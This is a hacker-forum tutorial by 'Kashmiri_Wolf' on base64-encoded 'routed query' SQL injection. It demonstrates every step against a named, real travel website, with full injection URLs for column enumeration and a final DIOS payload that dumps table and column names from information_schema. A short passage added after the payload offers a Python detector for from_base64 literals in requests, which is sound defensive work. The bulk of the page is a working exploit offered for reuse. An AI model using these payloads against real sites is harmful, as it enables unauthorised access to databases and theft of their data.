Base64 Based Routed Query By Kashmiri_Wolf – SQLi Basic

Tutorial On Base64 Based Routed Query By Kashmiri_Wolf

Assalam-O-Alaikum Guys!
This Is Kashmiri_Wolf. Today I Am Gonna Write About Base64 Based Routed Query.
We Will Use A New Function Here (New For Newbies Like Me),
Which Is “from_base64()”.

So Let's Get Straight To It:
Here Is The Site:

http://www.egytravelcorner.com/ar/articals-more.php?id=1

It's A Basic Injection Till Dios, So Here Is The Query For The Vuln Column:

http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(1),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384

Here Routed Query Is A Way To Dios It (For Pure Union Based And $_GET Method).

Hex Is Allowed Here, But We Will Use Base64 Routed Query Here. Let's Start …
   

http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KDEnKQ==')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384 

Here Is The Error For Routed Query. Let's Fix The Query And Get The Total Number Of Columns (Column Count):
   

http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KDEnLS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384

Query Balanced. Let's Check With Order By:

http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(from_base64('KDEnIG9yZGVyIGJ5IDktLSAtKQ==')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384

No Error

http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(from_base64('KDEnIG9yZGVyIGJ5IDEwLS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384

9 Columns. Let's Check For The Vuln Column:

http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KC4xJyAgVW5pb24gU2VsZWN0IDEsMiwzLDQsNSw2LDcsOCw5OS0tIC0p')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384

Vuln Column Is Under Image

Let's Dios:

http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(FROM_BASE64('KDEnLyoqXyoqLy8qITUwMDAwVW5pb24qL1NlbGVjdCAxMTEsMjIyLDMzMzMsY29uY2F0LyoqXyoqLygweDIyMmYzZTNjNjI3MjNlM2MyZjY0Njk3NjNlM2MyZjc0NjE2MjZjNjUzZTNjMmY3MDNlM2M2NjZmNmU3NDIwNjM2ZjZjNmY3MjNkNzI2NTY0MjA2NjYxNjM2NTNkNjM2MTZkNjI3MjY5NjEyMDczNjk3YTY1M2QzMzNlLG1ha2Vfc2V0KDYsQDo9MHgwYSwoc2VsZWN0KDEpZnJvbShpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyl3aGVyZUA6PW1ha2Vfc2V0KDUxMSxALDB4M2M2YzY5M2UsdGFibGVfbmFtZSxjb2x1bW5fbmFtZSkpLEApKSw1NjYsNjY2LDc3Nyw4ODgsOTk5LS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384

So Here Is Our Final Query!

Keeping The Concept In Mind, You Can Also Do The Same With Char I Guess (Not Tested Yet !!)
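
From the defender's side, every request above carries a `from_base64('...')` literal in the `id` parameter, so a log or WAF rule can decode that literal and inspect what it hides. The following is an added example, not part of the original post; the `shop.example` host, the `scan_request` name and the indicator list are assumptions made for illustration, and the two base64 literals are the short ones shown above.

```python
import base64, binascii, re
from urllib.parse import unquote

# from_base64('<literal>') with optional whitespace, any letter case
B64_CALL = re.compile(r"from_base64\s*\(\s*'([A-Za-z0-9+/=]+)'", re.I)
# SQL syntax that has no business inside a decoded request value (assumed list)
INDICATORS = {
    "quote": re.compile(r"'"),
    "comment": re.compile(r"--|#|/\*"),
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "order_by": re.compile(r"\border\s+by\b", re.I),
    "schema": re.compile(r"information_schema", re.I),
}

def scan_request(url):
    """Return [(decoded_text, [indicator names])] for each from_base64() literal."""
    # unquote(), not unquote_plus(): '+' is a valid base64 character
    text = unquote(url)
    findings = []
    for literal in B64_CALL.findall(text):
        try:
            raw = base64.b64decode(literal, validate=True)
            decoded = raw.decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            decoded = ""  # malformed literal: still report the call itself
        hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        findings.append((decoded, hits))
    return findings

# Constructed sample requests (hypothetical host; literals taken from the page)
SAMPLES = [
    "http://shop.example/item.php?id=1",
    "http://shop.example/item.php?id=1%27Union(Select(from_base64('KDEnKQ==')),(2))--%20-",
    "http://shop.example/item.php?id=1'Union(Select(FROM_BASE64('KDEnIG9yZGVyIGJ5IDktLSAtKQ==')),(2))-- -",
]

if __name__ == "__main__":
    for url in SAMPLES:
        for decoded, hits in scan_request(url):
            print(f"ALERT indicators={hits} decoded={decoded!r}")
```

Any `from_base64(` call arriving in a request parameter is worth an alert on its own; the decoded indicators only help triage. Detection does not replace the fix, which is binding the `id` value and any value read back from the database as parameters in every query that uses them.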

Credits To ~~> Master Benzi,Khexan Ro0t,Master Janus,Makman,Ajkaro,Rahul Maini,Raz

Sorry For Bad Explanation … If Any Problem, You Can PM Me Here: Kashmiri_Wolf

Thanks To Sqli-Basic For Letting Me Share This 🙂

Regards :
Kashmiri_Wolf



